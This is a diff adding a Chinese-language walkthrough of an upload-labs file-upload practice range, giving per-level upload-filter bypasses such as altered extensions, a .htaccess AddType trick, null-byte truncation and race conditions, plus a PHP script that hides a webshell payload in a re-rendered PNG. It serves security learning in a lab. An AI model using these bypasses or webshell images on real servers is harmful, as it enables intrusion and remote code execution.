--- a/_posts/2020-9-13-upload靶场.md
+++ b/_posts/2020-9-13-upload靶场.md
@@ -12,18 +12,166 @@ tags:
      - 文件上传
 ---
 
-
-
-
-
-
-
 # 验证思路
 
-![02](\img\upload-02.png)
+![02](..\img\upload-02.png)
 
 
 
 # 靶场题型
 
-![01](\img\upload-01.png)
+![01](..\img\upload-01.png)
+
+# 第一关和第二关
+
+1. 上传一张图片木马，burp抓包修改后缀为php：
+
+   ![](..\img\upload-03.png)
+
+# 第三关
+
+1. 上传一张图片木马，burp抓包修改后缀为`php3`或者`phtml`：
+
+   ![](..\img\upload-04.png)
+
+# 第四关
+
+1. 利用windows特性，上传后缀为`php. .`的木马：
+
+   ![](..\img\upload-05.png)
+
+2. 上传`.htaccess`文件，里面包含`AddType  application/x-httpd-php    .png`这一代码，让后上传图片木马，成功解析：
+
+   ![](..\img\upload-06.png)
+
+# 第五关
+
+1. 利用windows特性，上传后缀为`php. .`的木马：
+
+   ![](..\img\upload-07.png)
+
+# 第六关
+
+1. 上传一张图片木马，burp抓包修改后缀为pHP：
+
+   ![](..\img\upload-08.png)
+
+# 第七关
+
+1. 上传一张图片木马，burp抓包修改后缀为`php空格 `:
+
+   ![](..\img\upload-09.png)
+
+# 第八关和第十关
+
+1. 上传一张图片木马，burp抓包修改后缀为`php. . `:
+
+   ![](..\img\upload-10.png)
+
+# 第九关
+
+1. 上传一张图片木马，burp修改后缀为`1.php::$DATA`:
+
+   ![](..\img\upload-11.png)
+
+# 第十一关
+
+1. 上传一张图片木马，burp修改后缀为`1.pphphp`:
+
+   ![](..\img\upload-12.png)
+
+# 第十二关和第十三关
+
+1. 上传一张图片木马，发现存在图片保存路径可控，尝试对路径进行`00截断`:
+
+   ![](..\img\upload-13.png)
+
+   ![](..\img\upload-14.png)
+
+# 第十四关和第十五关和第十六关
+
+1. 使用`copy 1.png/b+1.php 2.png`生成一张图片木马，然后上传；利用文件包含漏洞进行利用：
+
+   ![](..\img\upload-15.png)
+
+# 第十七关
+
+- Gif二次渲染
+
+  > Gif图片的二次渲染只需要把php代码插入到前后上传的两张图片中数据不变的代码块中再次上传就可以了！
+
+  ![](..\img\upload-18.png)
+
+- Png二次渲染
+
+  1. 使用php脚本生成一个包含木马的图片，再结合文件包含漏洞进行远程代码执行：
+
+     ```php
+     <?php
+     $p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,
+                0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,
+                0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,
+                0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,
+                0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,
+                0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,
+                0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,
+                0x66, 0x44, 0x50, 0x33);
+     
+     $img = imagecreatetruecolor(32, 32);
+     
+     for ($y = 0; $y < sizeof($p); $y += 3) {
+        $r = $p[$y];
+        $g = $p[$y+1];
+        $b = $p[$y+2];
+        $color = imagecolorallocate($img, $r, $g, $b);
+        imagesetpixel($img, round($y / 3), 0, $color);
+     }
+     
+     imagepng($img,'./shell.png');
+     ?>
+     ```
+
+     ![](..\img\upload-19.png)
+
+  2. 写入PLTE数据块
+
+     > php底层在对PLTE数据块验证的时候,主要进行了CRC校验.所以可以再chunk data域插入php代码,然后重新计算相应的crc值并修改即可.
+     >
+     > 这种方式只针对索引彩色图像的png图片才有效,在选取png图片时可根据IHDR数据块的color type辨别.`03`为索引彩色图像.
+
+     不会，自行百度！
+
+- jpg二次渲染
+
+  1. 先上传jpg图片，然后再下载上传的图片（需要被服务端的代码中的`imagecreatefromjpeg`函数所渲染！）
+
+  2. 使用脚本生成带有payload的图片木马，地址：https://github.com/BlackFan/jpg_payload语法：`php jpg.php 1.jpg`
+
+  3. 使用文件包含漏洞利用图片木马
+
+     ![](..\img\upload-20.png)
+
+  > 此方法有一定的玄学，一张图片不行就换一张图片！
+
+# 第十八关和第十九关
+
+> 条件竞争： 有的服务器采用了先保存，再删除不合法文件的方式，在这种服务器中，可以反复上传一个会生成Web Shell的文件并尝试访问，多次之后即可获得Shell。 
+
+**电脑原因，复现失败!**
+
+# 第二十关
+
+1. 使用`00截断`进行绕过
+
+   ![](..\img\upload-16.png)
+
+   > - 使用`php/.`的后缀也可以绕过
+   > - 使用大小写也可以绕过
+   > - 使用`php空格`也可以绕过
+   > - 配合windos特性也可以绕过
+
+# 第二十一关
+
+1. 上传的`save_name`参数是可控的，可以构造如下数据包结合windows特性进行绕过：
+
+   ![](..\img\upload-17.png)
